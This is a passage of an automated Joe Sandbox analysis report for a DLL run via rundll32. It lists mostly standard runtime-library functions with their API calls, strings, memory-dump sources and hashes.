                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: NameName::
                                                                                                                                                                                                                                                                      • String ID: %lf
                                                                                                                                                                                                                                                                      • API String ID: 1333004437-2891890143
                                                                                                                                                                                                                                                                      • Opcode ID: 31f452ec5ec2fe0c56036b6d98129766a0febf28c96deb7dbc1a5cff6911fba6
                                                                                                                                                                                                                                                                      • Instruction ID: 034e1c8f7962a666fb3fc1dfd84da393ef72e1dbc0cb733e50f71f00acf91dbc
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31f452ec5ec2fe0c56036b6d98129766a0febf28c96deb7dbc1a5cff6911fba6
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B331C372604F8C85EBA2DF25A8503EA6351B74EBC5F54C216FA9A4B791DF2CC3498340
                                                                                                                                                                                                                                                                      Function 000000018000F96C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000F9F1
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000F9FF
                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000FA29
                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000FA97
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000FAA3
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                                      • Opcode ID: 08dec541e6110a4941d8e95383202020bda5a6dbff8e18ce6c91f5e870de479d
                                                                                                                                                                                                                                                                      • Instruction ID: e8c6680ccd9c6dd87d65be781d57c711bd3b5d14812437631edbc0f748074d2d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08dec541e6110a4941d8e95383202020bda5a6dbff8e18ce6c91f5e870de479d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF318071312B4891EEA7DB12A8007E63394BB4DBE0F598635BD1D4BB95EF3CC6499301
                                                                                                                                                                                                                                                                      Function 00000001800136C8 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+Replicator::operator[]
                                                                                                                                                                                                                                                                      • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                                                                                      • API String ID: 1405650943-2211150622
                                                                                                                                                                                                                                                                      • Opcode ID: 11a5eadd5112610793a0c7985b347ede0ac6dc60e7be4f47023946e3fa5dab14
                                                                                                                                                                                                                                                                      • Instruction ID: 1562cc7920372f8d96896f4d2247b54c2eb0bb003fb5d717fc29c8b40e6cc5f0
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11a5eadd5112610793a0c7985b347ede0ac6dc60e7be4f47023946e3fa5dab14
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA415FB6605F8898FBA28B68D8413EC77A0B30D788F54C415EA4817794DF79C749C711
                                                                                                                                                                                                                                                                      Function 000000018001568C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                                                                                      • String ID: char $int $long $short $unsigned
                                                                                                                                                                                                                                                                      • API String ID: 2943138195-3894466517
                                                                                                                                                                                                                                                                      • Opcode ID: 22589a7dd1b7f51ecc45e5e498e836ee65e773c3e0422199170bc379ef7ced78
                                                                                                                                                                                                                                                                      • Instruction ID: 33d68ee0dd99e5be83c02a107bf8deb86d92894b08a7c1c4eda6edb91acda212
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22589a7dd1b7f51ecc45e5e498e836ee65e773c3e0422199170bc379ef7ced78
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71316876614B58C8FB968F68E8513EC37B1B34D789F54C115EA885BBA8DF38C648C740
                                                                                                                                                                                                                                                                      Function 000000018000FBA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72libraryloaderCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                                      • Opcode ID: d889f2a22313e0ad3e013d7ebc648a4845f7bed772ca03482db31a9999fe791a
                                                                                                                                                                                                                                                                      • Instruction ID: b4b3ab6b1088bd05896873025a869169f262880e2f39a8d17b8af41b45206a1e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d889f2a22313e0ad3e013d7ebc648a4845f7bed772ca03482db31a9999fe791a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6218231601A4881FAA6CB16A9057A973A4BB4CBF0F5C8735FE2D47BD1EF38C6499300
                                                                                                                                                                                                                                                                      Function 0000000180048058 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71libraryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                      • API String ID: 3813093105-537541572
                                                                                                                                                                                                                                                                      • Opcode ID: 4da3f0794fd9870cc95b278e97dc4f2c9283c1eed835cc8f1e9aaf627fd9e4b8
                                                                                                                                                                                                                                                                      • Instruction ID: 16723c8e79fef191a1def12aff24d5b2aa2a9400166a0adaba498011b7871d09
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4da3f0794fd9870cc95b278e97dc4f2c9283c1eed835cc8f1e9aaf627fd9e4b8
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36217531311E4481EEA6CB16A8407992294BF4CBF4F59CB21FE2A577D5DF38C64A9304
                                                                                                                                                                                                                                                                      Function 000000018004832C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 66libraryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                      • API String ID: 3813093105-537541572
                                                                                                                                                                                                                                                                      • Opcode ID: 34d9fc0eea32f26ddee014de4325216aa93237d5f4069420858160f0f9dadc4b
                                                                                                                                                                                                                                                                      • Instruction ID: 2907248bf1d03caf4a9efb5c727e6e4733018bdc7bf12693e50b486c0c56baec
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34d9fc0eea32f26ddee014de4325216aa93237d5f4069420858160f0f9dadc4b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3521D332311F5881EAA6DB1698403A92390FB4DFE4F198725EF2A437D0DF38C60A8344
                                                                                                                                                                                                                                                                      Function 0000000180041790 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                      • Opcode ID: 931a7e6b1cf67cd6299caf61b7569a609212fd61884ef39ea5164ef7719851e4
                                                                                                                                                                                                                                                                      • Instruction ID: d1b00c180fb1e660eff0b05203a4b174045681b8f2dca1d24339f74a07491a67
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 931a7e6b1cf67cd6299caf61b7569a609212fd61884ef39ea5164ef7719851e4
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56219F30704E0C45FAD7632155953FD1292BF4C7F9F1ACB18B836076C6EE288B095389
                                                                                                                                                                                                                                                                      Function 00000001800415D4 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                      • Opcode ID: 381c2f5c7cc53769a437e8260949d7a39dcceed1a2f38c0e1111b755c595ed80
                                                                                                                                                                                                                                                                      • Instruction ID: 04686a5da5c4fff237ec5e8ba751c2965937e5176a8ea2e8cb852f05b55094a1
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 381c2f5c7cc53769a437e8260949d7a39dcceed1a2f38c0e1111b755c595ed80
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4116D30205E484AFAD6632155E53FD5242BB4C7F9F1ACB28B836077D6EE38CB095749
                                                                                                                                                                                                                                                                      Function 000000018005B3FC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                                      • Opcode ID: b6eeb1184294491e34f956f19ce6396f0c04242531a228f3773a2e0d11010417
                                                                                                                                                                                                                                                                      • Instruction ID: 83e0178ae380f36e1e9820465d588016c920ebf69cf6b00601a2110171500775
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6eeb1184294491e34f956f19ce6396f0c04242531a228f3773a2e0d11010417
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26119032310B8486E7A18B52F85535963A4F78CBE4F148224FA5987B94DF7DC6588740
                                                                                                                                                                                                                                                                      Function 00000001800157B4 Relevance: 9.2, APIs: 6, Instructions: 161COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+$NameName::
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 168861036-0
                                                                                                                                                                                                                                                                      • Opcode ID: 806119ddee8275eca90a34da7f6d98c465c2b67501ebe87a489ba9b8b95362ce
                                                                                                                                                                                                                                                                      • Instruction ID: 09ad68218d141e964a4945e14ce8a54b78ee7b9198dbdf3b1dfc829bb6e04cef
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 806119ddee8275eca90a34da7f6d98c465c2b67501ebe87a489ba9b8b95362ce
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7719D72610B98C9FB92CFA4E8803EC37A1F349795F61C016EA891B795DF79C659C301
                                                                                                                                                                                                                                                                      Function 000000018000CDF8 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                      • API String ID: 3523768491-393685449
                                                                                                                                                                                                                                                                      • Opcode ID: bda6544fe4ae76e9c966046574d2ab8aba2e0a6057aceda30bee322fd5c5b1c4
                                                                                                                                                                                                                                                                      • Instruction ID: f316bf09ab0905bbfcd6d3bf85c0ee5a6f9e6efb4081dae354aa448471526a42
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bda6544fe4ae76e9c966046574d2ab8aba2e0a6057aceda30bee322fd5c5b1c4
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8E1AE725047888AE7A2DF78D4803ED7BA1F759788F148226FF8957696CF34C689CB01
                                                                                                                                                                                                                                                                      Function 0000000180041908 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 0000000180041917
                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004194D
                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004197A
